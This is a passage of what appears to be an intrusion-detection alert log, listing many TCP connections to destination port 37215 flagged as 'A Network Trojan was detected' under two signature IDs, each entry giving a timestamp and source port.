          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177003
          SID:2835222
          Source Port:50626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600713
          SID:2829579
          Source Port:49394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744917
          SID:2829579
          Source Port:48136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604183
          SID:2835222
          Source Port:60030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128679
          SID:2829579
          Source Port:43692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157116
          SID:2835222
          Source Port:53180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.673170
          SID:2829579
          Source Port:42742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262080
          SID:2835222
          Source Port:51122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087419
          SID:2835222
          Source Port:55580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892268
          SID:2835222
          Source Port:48546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860236
          SID:2835222
          Source Port:58518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709884
          SID:2835222
          Source Port:45304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462651
          SID:2835222
          Source Port:47190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894931
          SID:2835222
          Source Port:37376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733754
          SID:2829579
          Source Port:49280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513232
          SID:2835222
          Source Port:33658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180663
          SID:2829579
          Source Port:46370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036556
          SID:2835222
          Source Port:40696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153611
          SID:2829579
          Source Port:41634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861122
          SID:2829579
          Source Port:51516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602011
          SID:2835222
          Source Port:34298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264110
          SID:2829579
          Source Port:46976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.152590
          SID:2835222
          Source Port:51374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233686
          SID:2829579
          Source Port:60502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842143
          SID:2829579
          Source Port:35408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178624
          SID:2829579
          Source Port:56784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.850635
          SID:2835222
          Source Port:52264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.818907
          SID:2835222
          Source Port:36956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.058199
          SID:2835222
          Source Port:60474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446098
          SID:2835222
          Source Port:34590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834448
          SID:2829579
          Source Port:40586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884153
          SID:2835222
          Source Port:57764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108829
          SID:2829579
          Source Port:51808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792379
          SID:2829579
          Source Port:50274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264110
          SID:2835222
          Source Port:49272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708455
          SID:2829579
          Source Port:45770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746427
          SID:2835222
          Source Port:50938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816601
          SID:2829579
          Source Port:49416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.293240
          SID:2835222
          Source Port:39756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704471
          SID:2835222
          Source Port:58536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855032
          SID:2829579
          Source Port:49496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160549
          SID:2829579
          Source Port:47222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601508
          SID:2829579
          Source Port:54206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783510
          SID:2829579
          Source Port:60844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465595
          SID:2829579
          Source Port:42822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016986
          SID:2835222
          Source Port:45216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822810
          SID:2829579
          Source Port:50078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.604796
          SID:2835222
          Source Port:49442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.161831
          SID:2829579
          Source Port:54640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403526
          SID:2829579
          Source Port:54438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793404
          SID:2829579
          Source Port:48942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177759
          SID:2829579
          Source Port:41678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789810
          SID:2835222
          Source Port:36484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783402
          SID:2829579
          Source Port:35118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352202
          SID:2829579
          Source Port:49890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129532
          SID:2835222
          Source Port:36182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019637
          SID:2829579
          Source Port:45740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514846
          SID:2835222
          Source Port:58840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136130
          SID:2829579
          Source Port:38144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860714
          SID:2835222
          Source Port:38388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789171
          SID:2835222
          Source Port:57876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729283
          SID:2835222
          Source Port:60420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.739814
          SID:2829579
          Source Port:44092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462819
          SID:2835222
          Source Port:55448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237523
          SID:2829579
          Source Port:54716
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.735023
          SID:2835222
          Source Port:40518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.041340
          SID:2829579
          Source Port:38530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513830
          SID:2829579
          Source Port:39438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.441890
          SID:2835222
          Source Port:41384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442140
          SID:2829579
          Source Port:40388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.302348
          SID:2835222
          Source Port:40062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887940
          SID:2835222
          Source Port:37144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.891932
          SID:2835222
          Source Port:42448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733510
          SID:2829579
          Source Port:50044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853527
          SID:2829579
          Source Port:57076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463491
          SID:2829579
          Source Port:35364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893430
          SID:2835222
          Source Port:36446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042054
          SID:2829579
          Source Port:42948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599080
          SID:2829579
          Source Port:52958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860188
          SID:2835222
          Source Port:36862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406892
          SID:2829579
          Source Port:35694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465819
          SID:2829579
          Source Port:44488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705031
          SID:2829579
          Source Port:44932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160164
          SID:2835222
          Source Port:43768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176115
          SID:2829579
          Source Port:47320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403716
          SID:2829579
          Source Port:54180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160498
          SID:2829579
          Source Port:55356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.306337
          SID:2835222
          Source Port:57856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240300
          SID:2835222
          Source Port:53278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781669
          SID:2835222
          Source Port:53554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704650
          SID:2835222
          Source Port:45088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461566
          SID:2835222
          Source Port:34486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895072
          SID:2829579
          Source Port:59814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542286
          SID:2835222
          Source Port:33984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.827532
          SID:2835222
          Source Port:44964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787174
          SID:2829579
          Source Port:51302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857181
          SID:2829579
          Source Port:33736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791957
          SID:2835222
          Source Port:37836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164381
          SID:2835222
          Source Port:50322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042617
          SID:2835222
          Source Port:38262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131786
          SID:2829579
          Source Port:39932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127398
          SID:2835222
          Source Port:51670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887392
          SID:2829579
          Source Port:48218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469580
          SID:2835222
          Source Port:47676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783187
          SID:2829579
          Source Port:44384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155424
          SID:2835222
          Source Port:35472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262346
          SID:2835222
          Source Port:46416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444151
          SID:2829579
          Source Port:45640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.173515
          SID:2829579
          Source Port:39588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159612
          SID:2829579
          Source Port:56254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.738539
          SID:2829579
          Source Port:38428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178020
          SID:2829579
          Source Port:45978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788464
          SID:2829579
          Source Port:43988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403951
          SID:2835222
          Source Port:55220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.786856
          SID:2835222
          Source Port:44524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729910
          SID:2835222
          Source Port:59170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.805006
          SID:2829579
          Source Port:53190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355422
          SID:2829579
          Source Port:54230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175727
          SID:2829579
          Source Port:59914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706178
          SID:2835222
          Source Port:34982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264495
          SID:2829579
          Source Port:59722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126554
          SID:2835222
          Source Port:60892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733880
          SID:2829579
          Source Port:50632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022180
          SID:2835222
          Source Port:47396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.265926
          SID:2829579
          Source Port:47350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787512
          SID:2835222
          Source Port:45552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706508
          SID:2829579
          Source Port:44950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178495
          SID:2835222
          Source Port:50656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113261
          SID:2829579
          Source Port:54802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242601
          SID:2835222
          Source Port:52356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745627
          SID:2835222
          Source Port:37204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155536
          SID:2829579
          Source Port:38136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057760
          SID:2835222
          Source Port:50246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378178
          SID:2835222
          Source Port:57830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161785
          SID:2829579
          Source Port:41502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.797525
          SID:2835222
          Source Port:57980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258039
          SID:2835222
          Source Port:54026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782886
          SID:2835222
          Source Port:43438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669668
          SID:2829579
          Source Port:48556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469107
          SID:2835222
          Source Port:34088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601295
          SID:2829579
          Source Port:43186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262488
          SID:2829579
          Source Port:32972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238584
          SID:2835222
          Source Port:40906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108321
          SID:2829579
          Source Port:53150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471976
          SID:2835222
          Source Port:41332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708530
          SID:2829579
          Source Port:35252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.128131
          SID:2829579
          Source Port:46672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.893720
          SID:2835222
          Source Port:46002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465236
          SID:2829579
          Source Port:53696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242973
          SID:2835222
          Source Port:56184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517672
          SID:2835222
          Source Port:55738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601778
          SID:2835222
          Source Port:42116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471212
          SID:2835222
          Source Port:34024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019813
          SID:2829579
          Source Port:57376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.445810
          SID:2829579
          Source Port:51098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107361
          SID:2835222
          Source Port:55836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110424
          SID:2835222
          Source Port:50024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112426
          SID:2829579
          Source Port:45236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465491
          SID:2835222
          Source Port:56708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792328
          SID:2835222
          Source Port:41382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731485
          SID:2835222
          Source Port:51942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170683
          SID:2835222
          Source Port:33734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743133
          SID:2835222
          Source Port:53154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816692
          SID:2829579
          Source Port:57044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155150
          SID:2835222
          Source Port:52224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463446
          SID:2829579
          Source Port:59832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.296924
          SID:2829579
          Source Port:53020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446482
          SID:2835222
          Source Port:47980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599650
          SID:2835222
          Source Port:48866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705795
          SID:2829579
          Source Port:33522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747984
          SID:2835222
          Source Port:43076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599926
          SID:2835222
          Source Port:41830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352671
          SID:2829579
          Source Port:49152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020834
          SID:2829579
          Source Port:52842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.731517
          SID:2835222
          Source Port:41374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.902371
          SID:2829579
          Source Port:48560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.510943
          SID:2835222
          Source Port:54840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896614
          SID:2835222
          Source Port:35274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705822
          SID:2829579
          Source Port:45964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.147688
          SID:2829579
          Source Port:35532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731528
          SID:2829579
          Source Port:33086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511595
          SID:2829579
          Source Port:60018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511651
          SID:2835222
          Source Port:60036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670454
          SID:2835222
          Source Port:49308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896775
          SID:2835222
          Source Port:57838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237465
          SID:2829579
          Source Port:35284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174258
          SID:2835222
          Source Port:38008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734291
          SID:2835222
          Source Port:35598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855279
          SID:2835222
          Source Port:48050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.820934
          SID:2829579
          Source Port:54520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269759
          SID:2829579
          Source Port:43174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471459
          SID:2835222
          Source Port:45198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670059
          SID:2835222
          Source Port:52100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449219
          SID:2835222
          Source Port:60820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461227
          SID:2829579
          Source Port:43152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351775
          SID:2829579
          Source Port:51362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.275323
          SID:2835222
          Source Port:59912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
